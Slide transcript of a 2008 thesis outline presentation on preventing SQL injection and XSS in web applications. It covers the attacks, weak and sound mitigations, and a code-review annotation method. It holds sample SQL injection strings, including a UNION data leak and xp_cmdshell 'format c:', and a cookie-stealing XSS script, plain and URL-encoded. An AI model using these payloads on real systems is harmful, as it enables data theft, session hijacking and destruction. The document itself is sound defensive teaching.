whatever it takes - fixing sqlia and xss in the process
DESCRIPTION
Concept presentation about my diploma thesis. About process ideas on how to prevent SQLIA and XSS vulnerabilities in web applicationsTRANSCRIPT
Whatever it takesFixing SQLIA and XSS in the process
Diploma Thesis Outline Presentation, Florian Thiel
Seminar “Beiträge zum Software Engineering”, FU Berlin, 11/06/2008
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
© by xckd: http://xkcd.com/327/
© by xckd: http://xkcd.com/327/
“SELECT firstname FROM Students WHERE (login = ‘%s’);” % login
© by xckd: http://xkcd.com/327/
“SELECT firstname FROM Students WHERE (login = ‘%s’);” % login
SELECT firstname FROM Students WHERE (login = ‘Robert’); DROP TABLE Students; -- ‘);
© by xckd: http://xkcd.com/327/
SQLIA threats
• data integrity
• confidentiality
• new attack vector
“UPDATE Users SET password = ‘%s’ WHERE uid = ‘%s’;” % (pw, uid)
UPDATE Users SET password = ‘password’ WHERE uid = ‘robert’ OR 1=1; --’;
Integrity
“SELECT product FROM Products WHERE productid = ‘%s’;” % pid
Confidentiality
SELECT product FROM Products WHERE productid = ‘0 UNION SELECT owner, balance FROM
Accounts; --’;
“SELECT product, price FROM products WHERE category = ‘%s’;” % category
SELECT product, price FROM products WHERE categoryid = exec
master..xp_cmdshell “format c:”-- ;
New Attack Vector
Bad Mitigations
• PHP: addslashes()
• IDS blacklisting
• validation blacklisting
Decent Mitigations
stmt = prepare(“SELECT name FROM Users WHERE uid = $1”)
db.execute(stmt, uid)
Why it’s hard
Control Data
More problems
• validation context != execution context
• really tolerant DBs
• “SEL”+”ECT”, anyone?
• DBs trying to fix illegal SQL
Something different!?
http://searchsite/search?keyword=”<script>alert(‘you have been XSSed!’)</script>”
Something different!?
http://searchsite/search?keyword=”<script>alert(‘you have been XSSed!’)</script>”
“This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. “
-- Marc Slemko, Apache.org
eval(‘user input’)1,2
1) the essence of XSS2) limited only by the execution environment
XSS
• code injection
• popular in ECMAScript/Web2.0
Got cookies?
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
Got cookies?%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e
The Worm
(Non-working) XSS Mitigations
• blacklisting of cribs
• blacklisting of characters
helpful mitigations
• HTTPOnly cookies
• Whitelisting of characters
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
• have no “API”
Failure to sanitize data into a different plane
Safe Query Objects
• “real” SQL API
• adds static types
• dynamic queries still runtime evaluated
AntiSamy
• Policy-based sanitation for HTML entities
• “Types” (by RegEx)
• (no semantics)
Another job well done!
GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1Host: msdn.microsoft.comUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-aCache-Control: max-age=0
Hmm, are we missing something
here?
Absolutely!
The interesting* part
* what my thesis is really about
Make sure that the technical solutions are thoroughly applied
1. Make developers use a reasonable architecture
2. Make developers recognize a weakness when they meet one
3. Make developers find weaknesses
4. Make people actually fix things
1) (Architecture)
• centralization
• canonicalization
• have to be conservative
2) (Recognition)
• patterns?
• flawed code examples in the wild
3) (Detection)
• automated flow analysis
• code inspection
Code inspection
• need a reading technique
• defect-based reading
Artifacts
• reviewer annotates suspicious code regions
• e.g. @userinput, @output
• makes review work visible in the source code
• and more valuable since annotations can be reused
// @userinput(data)// [insert data into query, ignore non-alphanums]def insertAlphaNum(query, data): // [make sure data is canonical] c_data = data.toCharSet(...) c_data.replace(...) ... // [insert data into query] query.prepare(...) query.insert(data...) ...
4) (Repair)
• once weakness is known, developers should be motivated enough
• focus is on keeping the code secure, minimizing effort
My tasks
• provide practical architectural assumptions
• construct effective reading method
• + awareness of potential weaknesses
• get a project to adopt my methods
Questions?
This presentation is licensed under a Creative Commons BY-SA license.
Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Attribution for pictures through links.
Thank you!
